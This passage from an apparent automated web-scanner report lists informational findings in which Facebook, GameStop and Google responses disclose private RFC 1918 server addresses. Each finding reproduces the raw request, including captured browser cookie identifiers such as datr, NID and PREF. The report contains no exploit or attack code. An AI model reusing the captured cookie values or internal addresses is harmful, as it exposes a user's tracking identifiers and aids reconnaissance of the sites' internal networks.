Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.26.38
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:41 GMT
Content-Length: 4251

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.239. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-video%2f1hh72z4pd%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-video/1hh72z4pd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.15.41
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:33 GMT
Content-Length: 4242

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.240. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=134781006600189&href=http://www.facebook.com/pages/The-Cabinet-Factory/138334366222901&send=false&layout=box_count&width=55&show_faces=true&action=like&colorscheme=light&font=tahoma&height=60 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.thecabinetfactory.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.204.58
X-Cnection: close
Date: Tue, 19 Jul 2011 20:50:45 GMT
Content-Length: 22620

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px
...[SNIP]...

24.241. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-shopping%2f1hhb0790y%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/video/bing-shopping/1hhb0790y?from=us&FORM=L8SP89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.41.44
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:35 GMT
Content-Length: 4259

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.242. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.25
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:22 GMT
Content-Length: 6328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.243. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.bing.com%2Ftravel%2Fplaces%3Fg%3Dtravel_destinations%26amp%3BFORM%3DFBVSLK%26amp%3Bmkt%3Den-US&ref=FBVSLK&height=35&width=399&send=false&layout=standard&show_faces=false&action=like&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/travel/places?FORM=TRABDT&g=travel_destinations
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.46
X-Cnection: close
Date: Tue, 19 Jul 2011 23:37:22 GMT
Content-Length: 5355

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.244. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=190&font=arial&colorscheme=light&ref=blogent HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.133.36
X-Cnection: close
Date: Tue, 19 Jul 2011 20:44:10 GMT
Content-Length: 23947

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px
...[SNIP]...

24.245. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=105579996199059&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c7c495b6eb54c%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff2c50e859711ee2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=62&href=http%3A%2F%2Fwww.facebook.com%2Ffansnap&locale=en_US&sdk=joey&show_faces=false&stream=false&width=225 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.190.59
X-Cnection: close
Date: Tue, 19 Jul 2011 19:34:12 GMT
Content-Length: 7990

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...

24.246. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/News.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.255.43
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:43 GMT
Content-Length: 10298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...

24.247. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=105579996199059&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ed0912f1adcec%26origin%3Dhttp%253A%252F%252Fwww.fansnap.com%252Ff22f9e9b374e2e%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=62&href=http%3A%2F%2Fwww.facebook.com%2Ffansnap&locale=en_US&sdk=joey&show_faces=false&stream=false&width=225 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.22.38
X-Cnection: close
Date: Tue, 19 Jul 2011 18:43:46 GMT
Content-Length: 7989

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...

24.248. http://www.facebook.com/privacy/explanation.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...

24.249. http://www.facebook.com/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...

24.250. http://www.facebook.com/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.106.37
X-Cnection: close
Date: Tue, 19 Jul 2011 15:01:04 GMT
Content-Length: 30713

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="UZGh";</script><noscript> <m
...[SNIP]...

24.251. http://www.facebook.com/terms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...

24.252. http://www.gamestop.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:25 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4265,4151,4287,4300,3852,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<meta name="WT.sv" content="172.20.202.38" />
...[SNIP]...

24.253. http://www.google.com/sdch/StnTz5pY.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=bUlBHSw9RyrvSttR5U3rNRUYEyCIoOHEeyqLUjvZvJYsnwvg_xFWbDFu8wRsyPCX0JzpkjV16vXwqOAIqiLeg1KuBr3sTsQOG_a12u1qyWQimnfWv4FY2HkQyWm7z0tD
If-Modified-Since: Mon, 18 Jul 2011 08:58:40 GMT

